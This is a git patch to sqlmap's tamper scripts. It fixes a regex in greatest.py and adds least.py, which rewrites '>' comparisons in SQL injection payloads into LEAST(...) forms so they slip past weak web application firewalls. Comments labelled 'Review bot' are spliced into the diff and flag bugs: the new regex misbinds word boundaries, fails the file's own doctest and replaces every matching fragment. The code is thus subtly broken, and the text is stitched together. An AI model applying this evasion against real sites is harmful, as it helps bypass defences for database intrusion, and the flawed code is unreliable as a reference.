From 7fb598a9ab0789ed987428cdf45a42f4f389dfe1 Mon Sep 17 00:00:00 2001
From: root
Date: Thu, 7 Sep 2017 23:01:50 +0700
Subject: [PATCH] Fix regex @greatest.py, add @least.py

---
 tamper/greatest.py | 4 ++--
 tamper/least.py | 43 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 45 insertions(+), 2 deletions(-)
 create mode 100644 tamper/least.py

diff --git a/tamper/greatest.py b/tamper/greatest.py
index 012cc6771..f04951f8c 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -36,10 +36,10 @@ def tamper(payload, **kwargs):
 retVal = payload
 
 if payload:
- match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
+ match = re.search(r"(?i)((?:\bAND|OR\b)\s*)((?:(?!\bAND|OR\b).)+?)\s*>\s*((?:(?!\bAND|OR\b).)+?)(\s*(?:\bAND|OR\b))", payload)
 
 if match:
- _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
+ _ = "%sGREATEST(%s,%s+1)=%s%s" % (match.group(1), match.group(2), match.group(3), match.group(2), match.group(4))
 retVal = retVal.replace(match.group(0), _)
 
 return retVal
diff --git a/tamper/least.py b/tamper/least.py
new file mode 100644
index 000000000..188cd9793
--- /dev/null
+++ b/tamper/least.py
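Review bot: The alternation in the new regex on the `+ match = re.search(...)` line binds the word boundary to only one side of each keyword — `(?:\bAND|OR\b)` means `\bAND` or `OR\b`, and the same holds for the `(?!\bAND|OR\b)` tempered lookaheads — so identifiers such as `ANDROID` or `FLOOR` are treated as keywords; `\b(?:AND|OR)\b` is what was meant. The trailing group `(\s*(?:\bAND|OR\b))` also makes a following AND/OR mandatory, so a payload that ends with the comparison, such as `1 AND A > B`, no longer matches and is returned untampered; the enclosing tamper() in greatest.py starts outside the hunk and presumably still carries that doctest, and the identical regex in the new tamper/least.py below contradicts its own `>>> tamper('1 AND A > B')` doctest, which expects `'1 AND LEAST(A,B+1)=B+1'`. A last group that accepts either a following keyword or the end of the payload keeps group(4) a string, so the format line can stay as is: `match = re.search(r"(?i)(\b(?:AND|OR)\b\s*)((?:(?!\b(?:AND|OR)\b).)+?)\s*>\s*((?:(?!\b(?:AND|OR)\b).)+?)(\s*\b(?:AND|OR)\b|\s*$)", payload)`. Note also that the removed pattern excluded `>`, `#` and `-` from the right operand via `[^>#-]+`, while the new tempered group has no such guard, so a trailing comment marker can be folded into the GREATEST(...) operand.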
@@ -0,0 +1,43 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+ pass
+
+def tamper(payload, **kwargs):
+ """
+ Replaces greater than operator ('>') with 'LEAST' counterpart
+
+ Tested against:
+ * MySQL 5.5
+
+ Notes:
+ * Useful to bypass weak and bespoke web application firewalls that
+ filter the greater than character
+ * The LEAST clause is a widespread SQL command. Hence, this
+ tamper script should work against majority of databases
+
+ >>> tamper('1 AND A > B')
+ '1 AND LEAST(A,B+1)=B+1'
+ """
+
+ retVal = payload
+
+ if payload:
+ match = re.search(r"(?i)((?:\bAND|OR\b)\s*)((?:(?!\bAND|OR\b).)+?)\s*>\s*((?:(?!\bAND|OR\b).)+?)(\s*(?:\bAND|OR\b))", payload)
+
+ if match:
+ _ = "%sLEAST(%s,%s+1)=%s+1%s" % (match.group(1), match.group(2), match.group(3), match.group(3), match.group(4))
+ retVal = retVal.replace(match.group(0), _)
+
+ return retVal
\ No newline at end of file
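Review bot: `retVal = retVal.replace(match.group(0), _)` on the line before `return retVal` substitutes every occurrence of the matched text, not the span the regex actually matched, so a payload that repeats the same `AND x > y OR` fragment is rewritten in more places than were examined; `retVal = retVal[:match.start()] + _ + retVal[match.end():]` edits exactly the matched span. The tempered `.` in the two operand groups of the `match = re.search(...)` line also does not cross a newline, so a payload carrying a line break between the keyword and the comparison is left untouched — presumably acceptable for the intended inputs, but worth a one-line comment on that line such as `# operands may not span a line break (tempered '.' stops at newline)`.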